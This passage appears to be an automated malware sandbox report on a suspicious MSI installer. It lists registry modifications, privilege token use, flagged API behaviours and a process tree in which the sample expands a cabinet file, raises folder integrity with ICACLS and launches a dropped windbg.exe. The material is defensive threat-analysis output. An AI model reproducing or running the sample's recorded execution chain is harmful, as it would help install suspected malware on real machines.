| N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000002169f83a7703da015fbaf4fd7e03da01cf0018512314da0114000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\0\NodeSlot = "5" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 = 50003100000000006a5774b010004c6f63616c003c0009000400efbe545754886a57a4b02e000000f9e101000000010000000000000000000000000000007a27d6004c006f00630061006c00000014000000 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0 = 4e003100000000006a57cfb1100054656d7000003a0009000400efbe545754886a57cfb12e000000fae101000000010000000000000000000000000000003499b300540065006d007000000014000000 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3350690463-3549324357-1323838019-1000\{DAB1A61E-0673-41FF-9099-F1EB9CF5E079} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\0 = 5e003100000000006a57c0b110004645464646457e310000460009000400efbe6a57c0b16a57c4b12e000000ff2f02000000070000000000000000000000000000006ad88c006600650066006600660065003800630065006100000018000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\0 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\0\MRUListEx = ffffffff | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 820074001c0043465346160031000000000054575488120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe545754886a57a4b02e000000e6e10100000001000000000000000000000000000000a9f1b5004100700070004400610074006100000042000000 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\2023-10-21\d2bdbe121774d186eaab95260beb2f8c5dc831464f1456cb57a7ce4a6239b8fc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\6da198925581418863170f05b832cd1584b923278d0730d779a30ec96513111d.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\4cb3a99ea9c84ec48f89ff320051b6d0 /t 1908 /p 3068
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2000 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4984 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4992 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 08527C7140C45298EFB4E121AF55E2A5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1780 /prefetch:1
C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-f55ff621-46e1-493b-b2bb-7e39b4be8933\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
C:\Windows\SysWOW64\EXPAND.EXE
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
C:\Users\Admin\AppData\Local\Temp\MW-f55ff621-46e1-493b-b2bb-7e39b4be8933\files\windbg.exe
